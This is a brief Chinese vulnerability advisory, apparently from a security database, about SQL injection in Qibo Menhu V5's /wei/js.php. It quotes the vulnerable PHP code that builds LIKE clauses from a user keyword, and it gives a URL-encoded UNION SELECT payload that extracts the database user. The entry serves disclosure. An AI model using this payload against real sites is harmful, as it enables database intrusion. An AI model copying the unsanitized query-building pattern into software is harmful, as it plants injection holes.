Qibo Menhu V5 /wei/js.php SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<ul><li>/wei/js.php</li></ul><pre class=""> elseif($type=='like') { $SQL.=" AND id!='$id' "; if(!$keyword) { extract($db-&gt;get_one("SELECT keywords AS keyword FROM {$_pre}content WHERE id='$id'")); } if($keyword){ $SQL.=" AND ( "; $keyword=urldecode($keyword); $detail=explode(" ",$keyword); unset($detail2); foreach( $detail AS $key=&gt;$value){ $detail2[]=" BINARY title LIKE '%$value%' "; } $str=implode(" OR ",$detail2); $SQL.=" $str ) "; }else{ $SQL.=" AND 0 "; } $_INDEX=" USE INDEX ( list ) "; $ORDER=' list '; } </pre><p>Keyword由空格分割后再implode带入SQL语句,造成SQL注入。</p><p>当发送payload:</p><pre class="">f_id=4,5,6&amp;keyword=n%%2527)UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM qb_wei_content &nbsp; USE INDEX ( list )&nbsp; WHERE&nbsp; fid IN ( 4,5,6 )&nbsp; AND id!='0'&nbsp; AND ( &nbsp; BINARY title LIKE...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息